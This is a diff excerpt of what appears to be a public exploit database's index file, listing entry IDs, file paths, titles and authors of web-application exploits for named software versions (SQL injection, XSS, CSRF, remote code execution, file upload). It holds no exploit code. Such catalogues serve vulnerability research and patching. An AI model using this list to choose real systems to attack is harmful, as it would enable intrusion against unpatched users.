49464,exploits/multiple/webapps/49464.py,"ERPNext 12.14.0 - SQL Injection (Authenticated)",1970-01-01,Hodorsec,webapps,multiple, 49464,exploits/multiple/webapps/49464.py,"ERPNext 12.14.0 - SQL Injection (Authenticated)",1970-01-01,Hodorsec,webapps,multiple,
49465,exploits/multiple/webapps/49465.py,"Atlassian Confluence Widget Connector Macro - SSTI",1970-01-01,46o60,webapps,multiple, 49465,exploits/multiple/webapps/49465.py,"Atlassian Confluence Widget Connector Macro - SSTI",1970-01-01,46o60,webapps,multiple,
@ -43920,6 +43954,7 @@ id,file,description,date,author,type,platform,port
49603,exploits/php/webapps/49603.py,"Online Catering Reservation System 1.0 - Remote Code Execution (Unauthenticated)",1970-01-01,"Christian Vierschilling",webapps,php, 49603,exploits/php/webapps/49603.py,"Online Catering Reservation System 1.0 - Remote Code Execution (Unauthenticated)",1970-01-01,"Christian Vierschilling",webapps,php,
49604,exploits/php/webapps/49604.py,"Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated)",1970-01-01,"Christian Vierschilling",webapps,php, 49604,exploits/php/webapps/49604.py,"Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated)",1970-01-01,"Christian Vierschilling",webapps,php,
49606,exploits/php/webapps/49606.py,"Tiny Tiny RSS - Remote Code Execution",1970-01-01,"Daniel Neagaru",webapps,php, 49606,exploits/php/webapps/49606.py,"Tiny Tiny RSS - Remote Code Execution",1970-01-01,"Daniel Neagaru",webapps,php,
49607,exploits/php/webapps/49607.txt,"Web Based Quiz System 1.0 - 'name' Persistent Cross-Site Scripting",1970-01-01,"P.Naveen Kumar",webapps,php,
49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",1970-01-01,"Mücahit Saratar",webapps,php, 49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",1970-01-01,"Mücahit Saratar",webapps,php,
49609,exploits/php/webapps/49609.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)",1970-01-01,"Tushar Vaidya",webapps,php, 49609,exploits/php/webapps/49609.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)",1970-01-01,"Tushar Vaidya",webapps,php,
49610,exploits/php/webapps/49610.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - Blind & Error based SQL injection (Authenticated)",1970-01-01,"Tushar Vaidya",webapps,php, 49610,exploits/php/webapps/49610.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - Blind & Error based SQL injection (Authenticated)",1970-01-01,"Tushar Vaidya",webapps,php,
@ -43969,6 +44004,7 @@ id,file,description,date,author,type,platform,port
49705,exploits/multiple/webapps/49705.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated)",1970-01-01,WangYihang,webapps,multiple, 49705,exploits/multiple/webapps/49705.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated)",1970-01-01,WangYihang,webapps,multiple,
49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",1970-01-01,MiningOmerta,webapps,hardware, 49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",1970-01-01,MiningOmerta,webapps,hardware,
49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",1970-01-01,"Jithin KS",webapps,hardware, 49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",1970-01-01,"Jithin KS",webapps,hardware,
49711,exploits/php/webapps/49711.py,"Dolibarr ERP 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)",1970-01-01,"Andrea Gonzalez",webapps,php,
49712,exploits/php/webapps/49712.html,"'customhs_js_content' - 'customhs_js_content' Cross-Site Request Forgery",1970-01-01,"Abhishek Joshi",webapps,php, 49712,exploits/php/webapps/49712.html,"'customhs_js_content' - 'customhs_js_content' Cross-Site Request Forgery",1970-01-01,"Abhishek Joshi",webapps,php,
49713,exploits/php/webapps/49713.txt,"Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting",1970-01-01,"George Tsimpidas",webapps,php, 49713,exploits/php/webapps/49713.txt,"Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting",1970-01-01,"George Tsimpidas",webapps,php,
49714,exploits/php/webapps/49714.txt,"Moodle 3.10.3 - 'label' Persistent Cross Site Scripting",1970-01-01,Vincent666,webapps,php, 49714,exploits/php/webapps/49714.txt,"Moodle 3.10.3 - 'label' Persistent Cross Site Scripting",1970-01-01,Vincent666,webapps,php,
@ -44014,6 +44050,7 @@ id,file,description,date,author,type,platform,port
49769,exploits/multiple/webapps/49769.py,"Horde Groupware Webmail 5.2.22 - Stored XSS",1970-01-01,nu11secur1ty,webapps,multiple, 49769,exploits/multiple/webapps/49769.py,"Horde Groupware Webmail 5.2.22 - Stored XSS",1970-01-01,nu11secur1ty,webapps,multiple,
49771,exploits/multiple/webapps/49771.txt,"Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)",1970-01-01,"Akash Chathoth",webapps,multiple, 49771,exploits/multiple/webapps/49771.txt,"Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)",1970-01-01,"Akash Chathoth",webapps,multiple,
49772,exploits/multiple/webapps/49772.py,"htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple, 49772,exploits/multiple/webapps/49772.py,"htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple,
49774,exploits/php/webapps/49774.py,"GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery",1970-01-01,boku,webapps,php,
49775,exploits/hardware/webapps/49775.html,"Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)",1970-01-01,"Rodolfo Mariano",webapps,hardware, 49775,exploits/hardware/webapps/49775.html,"Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)",1970-01-01,"Rodolfo Mariano",webapps,hardware,
49802,exploits/multiple/webapps/49802.py,"Hasura GraphQL 1.3.3 - Remote Code Execution",1970-01-01,"Dolev Farhi",webapps,multiple, 49802,exploits/multiple/webapps/49802.py,"Hasura GraphQL 1.3.3 - Remote Code Execution",1970-01-01,"Dolev Farhi",webapps,multiple,
49777,exploits/php/webapps/49777.txt,"Fast PHP Chat 1.3 - 'my_item_search' SQL Injection",1970-01-01,"Fatih Coskun",webapps,php, 49777,exploits/php/webapps/49777.txt,"Fast PHP Chat 1.3 - 'my_item_search' SQL Injection",1970-01-01,"Fatih Coskun",webapps,php,
@ -44026,6 +44063,7 @@ id,file,description,date,author,type,platform,port
49785,exploits/hardware/webapps/49785.txt,"Adtran Personal Phone Manager 10.8.1 - 'emailAddress' Stored Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,hardware, 49785,exploits/hardware/webapps/49785.txt,"Adtran Personal Phone Manager 10.8.1 - 'emailAddress' Stored Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,hardware,
49786,exploits/hardware/webapps/49786.txt,"Adtran Personal Phone Manager 10.8.1 - 'Multiple' Reflected Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,hardware, 49786,exploits/hardware/webapps/49786.txt,"Adtran Personal Phone Manager 10.8.1 - 'Multiple' Reflected Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,hardware,
49787,exploits/hardware/webapps/49787.txt,"Adtran Personal Phone Manager 10.8.1 - DNS Exfiltration",1970-01-01,3ndG4me,webapps,hardware, 49787,exploits/hardware/webapps/49787.txt,"Adtran Personal Phone Manager 10.8.1 - DNS Exfiltration",1970-01-01,3ndG4me,webapps,hardware,
49788,exploits/php/webapps/49788.rb,"GravCMS 1.10.7 - Unauthenticated Arbitrary File Write (Metasploit)",1970-01-01,"Mehmet Ince",webapps,php,
49790,exploits/multiple/webapps/49790.py,"Hasura GraphQL 1.3.3 - Local File Read",1970-01-01,"Dolev Farhi",webapps,multiple, 49790,exploits/multiple/webapps/49790.py,"Hasura GraphQL 1.3.3 - Local File Read",1970-01-01,"Dolev Farhi",webapps,multiple,
49791,exploits/multiple/webapps/49791.py,"Hasura GraphQL 1.3.3 - Service Side Request Forgery (SSRF)",1970-01-01,"Dolev Farhi",webapps,multiple, 49791,exploits/multiple/webapps/49791.py,"Hasura GraphQL 1.3.3 - Service Side Request Forgery (SSRF)",1970-01-01,"Dolev Farhi",webapps,multiple,
49793,exploits/php/webapps/49793.txt,"CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)",1970-01-01,bt0,webapps,php, 49793,exploits/php/webapps/49793.txt,"CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)",1970-01-01,bt0,webapps,php,
@ -44033,19 +44071,34 @@ id,file,description,date,author,type,platform,port
49797,exploits/php/webapps/49797.txt,"Moodle 3.10.3 - 'url' Persistent Cross Site Scripting",1970-01-01,UVision,webapps,php, 49797,exploits/php/webapps/49797.txt,"Moodle 3.10.3 - 'url' Persistent Cross Site Scripting",1970-01-01,UVision,webapps,php,
49799,exploits/multiple/webapps/49799.py,"DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple, 49799,exploits/multiple/webapps/49799.py,"DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple,
49800,exploits/hardware/webapps/49800.html,"Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,webapps,hardware, 49800,exploits/hardware/webapps/49800.html,"Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,webapps,hardware,
50462,exploits/aspx/webapps/50462.txt,"Umbraco v8.14.1 - 'baseUrl' SSRF",1970-01-01,NgoAnhDuc,webapps,aspx,
49801,exploits/hardware/webapps/49801.html,"Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,hardware, 49801,exploits/hardware/webapps/49801.html,"Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,hardware,
49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",1970-01-01,"Fellipe Oliveira",webapps,python, 49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",1970-01-01,"Fellipe Oliveira",webapps,python,
49804,exploits/php/webapps/49804.py,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2)",1970-01-01,nu11secur1ty,webapps,php, 49804,exploits/php/webapps/49804.py,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2)",1970-01-01,nu11secur1ty,webapps,php,
49805,exploits/php/webapps/49805.txt,"Kimai 1.14 - CSV Injection",1970-01-01,"Mohammed Aloraimi",webapps,php, 49805,exploits/php/webapps/49805.txt,"Kimai 1.14 - CSV Injection",1970-01-01,"Mohammed Aloraimi",webapps,php,
49808,exploits/php/webapps/49808.txt,"Kirby CMS 3.5.3.1 - 'file' Cross-Site Scripting (XSS)",1970-01-01,"Sreenath Raghunathan",webapps,php, 49808,exploits/php/webapps/49808.txt,"Kirby CMS 3.5.3.1 - 'file' Cross-Site Scripting (XSS)",1970-01-01,"Sreenath Raghunathan",webapps,php,
49810,exploits/php/webapps/49810.py,"Cacti 1.2.12 - 'filter' SQL Injection",1970-01-01,"Leonardo Paiva",webapps,php,
49811,exploits/php/webapps/49811.txt,"FOGProject 1.5.9 - File Upload RCE (Authenticated)",1970-01-01,sml,webapps,php, 49811,exploits/php/webapps/49811.txt,"FOGProject 1.5.9 - File Upload RCE (Authenticated)",1970-01-01,sml,webapps,php,
49813,exploits/multiple/webapps/49813.py,"NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write",1970-01-01,1F98D,webapps,multiple, 49813,exploits/multiple/webapps/49813.py,"NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write",1970-01-01,1F98D,webapps,multiple,
49814,exploits/php/webapps/49814.txt,"Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)",1970-01-01,"Fariskhi Vidyan",webapps,php, 49814,exploits/php/webapps/49814.txt,"Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)",1970-01-01,"Fariskhi Vidyan",webapps,php,
49816,exploits/php/webapps/49816.py,"GetSimple CMS Custom JS 0.1 - Cross-Site Request Forgery",1970-01-01,boku,webapps,php,
49817,exploits/php/webapps/49817.txt,"Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection)",1970-01-01,"Syed Sheeraz Ali",webapps,php, 49817,exploits/php/webapps/49817.txt,"Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection)",1970-01-01,"Syed Sheeraz Ali",webapps,php,
49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",1970-01-01,nu11secur1ty,webapps,php, 49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",1970-01-01,nu11secur1ty,webapps,php,
49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",1970-01-01,4D0niiS,webapps,ruby, 49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",1970-01-01,4D0niiS,webapps,ruby,
49822,exploits/ruby/webapps/49822.txt,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",1970-01-01,4D0niiS,webapps,ruby, 49822,exploits/ruby/webapps/49822.txt,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",1970-01-01,4D0niiS,webapps,ruby,
49823,exploits/php/webapps/49823.py,"Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated)",1970-01-01,argenestel,webapps,php,
49825,exploits/php/webapps/49825.txt,"Savsoft Quiz 5 - 'User Account Settings' Persistent Cross-Site Scripting",1970-01-01,strider,webapps,php, 49825,exploits/php/webapps/49825.txt,"Savsoft Quiz 5 - 'User Account Settings' Persistent Cross-Site Scripting",1970-01-01,strider,webapps,php,
49826,exploits/multiple/webapps/49826.js,"Markdown Explorer 0.1.1 - Persistent Cross-Site Scripting",1970-01-01,"Taurus Omar",webapps,multiple,
49827,exploits/multiple/webapps/49827.js,"Xmind 2020 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
49828,exploits/multiple/webapps/49828.js,"Tagstoo 2.0.1 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
49829,exploits/multiple/webapps/49829.js,"SnipCommand 0.1.0 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
49830,exploits/multiple/webapps/49830.js,"Moeditor 0.2.0 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
49831,exploits/multiple/webapps/49831.js,"Marky 0.0.1 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
49832,exploits/multiple/webapps/49832.js,"StudyMD 0.3.2 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
49833,exploits/multiple/webapps/49833.js,"Freeter 1.2.1 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
49834,exploits/multiple/webapps/49834.js,"Markright 1.0 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
49835,exploits/multiple/webapps/49835.js,"Markdownify 1.2.0 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
49836,exploits/multiple/webapps/49836.js,"Anote 1.0 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
49837,exploits/multiple/webapps/49837.txt,"Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)",1970-01-01,"Emircan Baş",webapps,multiple, 49837,exploits/multiple/webapps/49837.txt,"Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)",1970-01-01,"Emircan Baş",webapps,multiple,
49838,exploits/multiple/webapps/49838.txt,"Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)",1970-01-01,"Eren Saraç",webapps,multiple, 49838,exploits/multiple/webapps/49838.txt,"Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)",1970-01-01,"Eren Saraç",webapps,multiple,
49839,exploits/php/webapps/49839.txt,"Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload",1970-01-01,h4shur,webapps,php, 49839,exploits/php/webapps/49839.txt,"Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload",1970-01-01,h4shur,webapps,php,
@ -44072,6 +44125,8 @@ id,file,description,date,author,type,platform,port
49873,exploits/php/webapps/49873.txt,"Simple Chatbot Application 1.0 - 'Category' Stored Cross site Scripting",1970-01-01,"Vani K G",webapps,php, 49873,exploits/php/webapps/49873.txt,"Simple Chatbot Application 1.0 - 'Category' Stored Cross site Scripting",1970-01-01,"Vani K G",webapps,php,
49874,exploits/php/webapps/49874.txt,"Billing Management System 2.0 - Union based SQL injection (Authenticated)",1970-01-01,"Mohammad Koochaki",webapps,php, 49874,exploits/php/webapps/49874.txt,"Billing Management System 2.0 - Union based SQL injection (Authenticated)",1970-01-01,"Mohammad Koochaki",webapps,php,
49875,exploits/php/webapps/49875.txt,"Advanced Guestbook 2.4.4 - 'Smilies' Persistent Cross-Site Scripting (XSS)",1970-01-01,"Abdulkadir AYDOGAN",webapps,php, 49875,exploits/php/webapps/49875.txt,"Advanced Guestbook 2.4.4 - 'Smilies' Persistent Cross-Site Scripting (XSS)",1970-01-01,"Abdulkadir AYDOGAN",webapps,php,
49876,exploits/php/webapps/49876.py,"Subrion CMS 4.2.1 - Arbitrary File Upload",1970-01-01,"Fellipe Oliveira",webapps,php,
49877,exploits/php/webapps/49877.txt,"Printable Staff ID Card Creator System 1.0 - 'email' SQL Injection",1970-01-01,bwnz,webapps,php,
49878,exploits/php/webapps/49878.txt,"EgavilanMedia PHPCRUD 1.0 - 'First Name' SQL Injection",1970-01-01,"Dimitrios Mitakos",webapps,php, 49878,exploits/php/webapps/49878.txt,"EgavilanMedia PHPCRUD 1.0 - 'First Name' SQL Injection",1970-01-01,"Dimitrios Mitakos",webapps,php,
49879,exploits/windows/webapps/49879.py,"Microsoft Exchange 2019 - Unauthenticated Email Download",1970-01-01,"Gonzalo Villegas",webapps,windows, 49879,exploits/windows/webapps/49879.py,"Microsoft Exchange 2019 - Unauthenticated Email Download",1970-01-01,"Gonzalo Villegas",webapps,windows,
49880,exploits/php/webapps/49880.txt,"WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)",1970-01-01,"Hosein Vita",webapps,php, 49880,exploits/php/webapps/49880.txt,"WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)",1970-01-01,"Hosein Vita",webapps,php,
@ -44082,6 +44137,7 @@ id,file,description,date,author,type,platform,port
49891,exploits/multiple/webapps/49891.txt,"Spotweb 1.4.9 - DOM Based Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple, 49891,exploits/multiple/webapps/49891.txt,"Spotweb 1.4.9 - DOM Based Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple,
49894,exploits/php/webapps/49894.sh,"WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated)",1970-01-01,"Mansoor R",webapps,php, 49894,exploits/php/webapps/49894.sh,"WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated)",1970-01-01,"Mansoor R",webapps,php,
49895,exploits/windows/webapps/49895.rb,"Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)",1970-01-01,mekhalleh,webapps,windows, 49895,exploits/windows/webapps/49895.rb,"Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)",1970-01-01,mekhalleh,webapps,windows,
49897,exploits/multiple/webapps/49897.txt,"Schlix CMS 2.2.6-6 - Arbitary File Upload (Authenticated)",1970-01-01,"Emir Polat",webapps,multiple,
49901,exploits/java/webapps/49901.txt,"Shopizer 2.16.0 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,"Marek Toth",webapps,java, 49901,exploits/java/webapps/49901.txt,"Shopizer 2.16.0 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,"Marek Toth",webapps,java,
49902,exploits/multiple/webapps/49902.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated) (2)",1970-01-01,"Ron Jost",webapps,multiple, 49902,exploits/multiple/webapps/49902.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated) (2)",1970-01-01,"Ron Jost",webapps,multiple,
49903,exploits/php/webapps/49903.txt,"WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)",1970-01-01,"Bastijn Ouwendijk",webapps,php, 49903,exploits/php/webapps/49903.txt,"WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)",1970-01-01,"Bastijn Ouwendijk",webapps,php,
@ -44094,6 +44150,7 @@ id,file,description,date,author,type,platform,port
49912,exploits/php/webapps/49912.txt,"WordPress Plugin LifterLMS 4.21.0 - Stored Cross-Site Scripting (XSS)",1970-01-01,Captain_hook,webapps,php, 49912,exploits/php/webapps/49912.txt,"WordPress Plugin LifterLMS 4.21.0 - Stored Cross-Site Scripting (XSS)",1970-01-01,Captain_hook,webapps,php,
49913,exploits/php/webapps/49913.py,"Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated)",1970-01-01,"Ron Jost",webapps,php, 49913,exploits/php/webapps/49913.py,"Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated)",1970-01-01,"Ron Jost",webapps,php,
49914,exploits/php/webapps/49914.py,"Trixbox 2.8.0.4 - 'lang' Path Traversal",1970-01-01,"Ron Jost",webapps,php, 49914,exploits/php/webapps/49914.py,"Trixbox 2.8.0.4 - 'lang' Path Traversal",1970-01-01,"Ron Jost",webapps,php,
49915,exploits/linux/webapps/49915.rb,"Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver)",1970-01-01,"Jon Stratton",webapps,linux,
49918,exploits/multiple/webapps/49918.py,"LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)",1970-01-01,g0ldm45k,webapps,multiple, 49918,exploits/multiple/webapps/49918.py,"LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)",1970-01-01,g0ldm45k,webapps,multiple,
49919,exploits/php/webapps/49919.txt,"ProjeQtOr Project Management 9.1.4 - Remote Code Execution",1970-01-01,"Temel Demir",webapps,php, 49919,exploits/php/webapps/49919.txt,"ProjeQtOr Project Management 9.1.4 - Remote Code Execution",1970-01-01,"Temel Demir",webapps,php,
49920,exploits/hardware/webapps/49920.html,"Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF)",1970-01-01,lated,webapps,hardware, 49920,exploits/hardware/webapps/49920.html,"Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF)",1970-01-01,lated,webapps,hardware,
@ -44109,6 +44166,7 @@ id,file,description,date,author,type,platform,port
49932,exploits/php/webapps/49932.txt,"Seo Panel 4.8.0 - 'category' Reflected XSS",1970-01-01,"Piyush Patil",webapps,php, 49932,exploits/php/webapps/49932.txt,"Seo Panel 4.8.0 - 'category' Reflected XSS",1970-01-01,"Piyush Patil",webapps,php,
49933,exploits/php/webapps/49933.py,"PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution",1970-01-01,flast101,webapps,php, 49933,exploits/php/webapps/49933.py,"PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution",1970-01-01,flast101,webapps,php,
49935,exploits/php/webapps/49935.txt,"Seo Panel 4.8.0 - 'from_time' Reflected XSS",1970-01-01,"Piyush Patil",webapps,php, 49935,exploits/php/webapps/49935.txt,"Seo Panel 4.8.0 - 'from_time' Reflected XSS",1970-01-01,"Piyush Patil",webapps,php,
49937,exploits/hardware/webapps/49937.txt,"CHIYU IoT Devices - Denial of Service (DoS)",1970-01-01,sirpedrotavares,webapps,hardware,
50062,exploits/php/webapps/50062.py,"Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated)",1970-01-01,"Bryan Leong",webapps,php, 50062,exploits/php/webapps/50062.py,"Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated)",1970-01-01,"Bryan Leong",webapps,php,
49942,exploits/php/webapps/49942.txt,"FUDForum 3.1.0 - 'srch' Reflected XSS",1970-01-01,"Piyush Patil",webapps,php, 49942,exploits/php/webapps/49942.txt,"FUDForum 3.1.0 - 'srch' Reflected XSS",1970-01-01,"Piyush Patil",webapps,php,
49943,exploits/php/webapps/49943.txt,"FUDForum 3.1.0 - 'author' Reflected XSS",1970-01-01,"Piyush Patil",webapps,php, 49943,exploits/php/webapps/49943.txt,"FUDForum 3.1.0 - 'author' Reflected XSS",1970-01-01,"Piyush Patil",webapps,php,
@ -44137,6 +44195,7 @@ id,file,description,date,author,type,platform,port
49985,exploits/multiple/webapps/49985.txt,"Grocery crud 1.6.4 - 'order_by' SQL Injection",1970-01-01,TonyShavez,webapps,multiple, 49985,exploits/multiple/webapps/49985.txt,"Grocery crud 1.6.4 - 'order_by' SQL Injection",1970-01-01,TonyShavez,webapps,multiple,
49986,exploits/multiple/webapps/49986.txt,"Solar-Log 500 2.8.2 - Incorrect Access Control",1970-01-01,Luca.Chiou,webapps,multiple, 49986,exploits/multiple/webapps/49986.txt,"Solar-Log 500 2.8.2 - Incorrect Access Control",1970-01-01,Luca.Chiou,webapps,multiple,
49987,exploits/multiple/webapps/49987.txt,"Solar-Log 500 2.8.2 - Unprotected Storage of Credentials",1970-01-01,Luca.Chiou,webapps,multiple, 49987,exploits/multiple/webapps/49987.txt,"Solar-Log 500 2.8.2 - Unprotected Storage of Credentials",1970-01-01,Luca.Chiou,webapps,multiple,
49988,exploits/php/webapps/49988.txt,"Zenario CMS 8.8.52729 - 'cID' SQL injection (Authenticated)",1970-01-01,"Avinash R",webapps,php,
49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",1970-01-01,securityforeveryone.com,webapps,php, 49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",1970-01-01,securityforeveryone.com,webapps,php,
49990,exploits/multiple/webapps/49990.txt,"Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)",1970-01-01,"Abdulazeez Alaseeri",webapps,multiple, 49990,exploits/multiple/webapps/49990.txt,"Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)",1970-01-01,"Abdulazeez Alaseeri",webapps,multiple,
49991,exploits/multiple/webapps/49991.txt,"Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)",1970-01-01,"Abdulazeez Alaseeri",webapps,multiple, 49991,exploits/multiple/webapps/49991.txt,"Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)",1970-01-01,"Abdulazeez Alaseeri",webapps,multiple,
@ -44144,6 +44203,7 @@ id,file,description,date,author,type,platform,port
49993,exploits/php/webapps/49993.txt,"COVID19 Testing Management System 1.0 - 'State' Stored Cross-Site-Scripting (XSS)",1970-01-01,"BHAVESH KAUL",webapps,php, 49993,exploits/php/webapps/49993.txt,"COVID19 Testing Management System 1.0 - 'State' Stored Cross-Site-Scripting (XSS)",1970-01-01,"BHAVESH KAUL",webapps,php,
49994,exploits/php/webapps/49994.txt,"Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated)",1970-01-01,"Riadh Benlamine",webapps,php, 49994,exploits/php/webapps/49994.txt,"Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated)",1970-01-01,"Riadh Benlamine",webapps,php,
49995,exploits/php/webapps/49995.txt,"Small CRM 3.0 - 'Authentication Bypass' SQL Injection",1970-01-01,"BHAVESH KAUL",webapps,php, 49995,exploits/php/webapps/49995.txt,"Small CRM 3.0 - 'Authentication Bypass' SQL Injection",1970-01-01,"BHAVESH KAUL",webapps,php,
49996,exploits/php/webapps/49996.txt,"TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)",1970-01-01,"Mert Daş",webapps,php,
49998,exploits/php/webapps/49998.py,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php, 49998,exploits/php/webapps/49998.py,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
50007,exploits/php/webapps/50007.txt,"Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)",1970-01-01,"BHAVESH KAUL",webapps,php, 50007,exploits/php/webapps/50007.txt,"Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)",1970-01-01,"BHAVESH KAUL",webapps,php,
50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",1970-01-01,"BHAVESH KAUL",webapps,tru64, 50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",1970-01-01,"BHAVESH KAUL",webapps,tru64,
@ -44177,11 +44237,13 @@ id,file,description,date,author,type,platform,port
